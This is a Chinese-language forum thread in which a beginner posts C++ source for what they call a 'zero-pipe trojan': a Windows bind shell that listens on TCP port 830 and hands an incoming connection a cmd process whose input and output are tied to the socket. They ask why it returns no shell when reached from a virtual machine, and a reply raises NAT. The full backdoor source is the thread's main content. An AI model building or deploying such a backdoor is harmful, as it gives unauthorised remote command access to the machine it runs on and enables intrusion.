以下是个零管道木马程序
// CMDPipe0.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib")

int main()
{
   WSADATA ws;
   SOCKET listenfd;
   int ret;
   //初始化wsa
   WSAStartup(MAKEWORD(2,2),&ws);
   // 建立socket,注意要用WSASocket
   listenfd=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
  //[屏蔽]本机830端口
   struct sockaddr_in server;
   server.sin_family=AF_INET;
   server.sin_port=htons(830);
   server.sin_addr.s_addr=INADDR_ANY;
   ret=bind(listenfd,(struct sockaddr *)&server,sizeof(server));
   ret=listen(listenfd,2);
   //如果客户端请求830端口,接受连接
   int iAddrSize=sizeof(server);
   SOCKET clientfd=accept(listenfd,(struct sockaddr *)&server,&iAddrSize);
   STARTUPINFO si;
   ZeroMemory(&si,sizeof(si));
  si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
   si.wShowWindow=SW_HIDE;
   si.wShowWindow=SW_SHOWNORMAL;
   si.hStdInput=si.hStdOutput=si.hStdError=(void *)clientfd; //零管道通信的关键!!!
  char cmdLine[]="cmd";
   PROCESS_INFORMATION ProcessInformation;
   //建立进程
   ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);

  return 0;
}
,但在实现过程中出了点问题.首先我在本机上编译运行该文件,以使本机处于830端口的[屏蔽]状态,系统弹出如下图01所示控制台的窗口

然后,我在虚拟机对本机进行连接,打算接收开放的cmd shell,如若成功本应当如下图04所示,可以对本机进行相应的dos指令的操作

可是运行结果却是本机控制台窗口如图02,虚拟机上客户端的窗口却没有任何反应,按下任意键后仍然没有获得本机的shell ,还在自己的虚拟机上如图03.根据主机的反应,我想它应当是受到了客户端的请求的,主要原因应当在cmd进程的通信过程出了差错,可我还只是个初学者,毕竟学习还不够深入,一些细节还不够清楚,故而恳请各位蝈蝈指点.

谢谢!!!!!!!!!!!

你是主机连虚拟机呢？
还是虚拟机连主机呢？
如果是虚拟机连主机。那么应该能正常工作。
但是如果是主机连虚拟机。这里就有个nat的影响了。。。
真实的端口就不是你程序里的端口了

是虚拟机连主机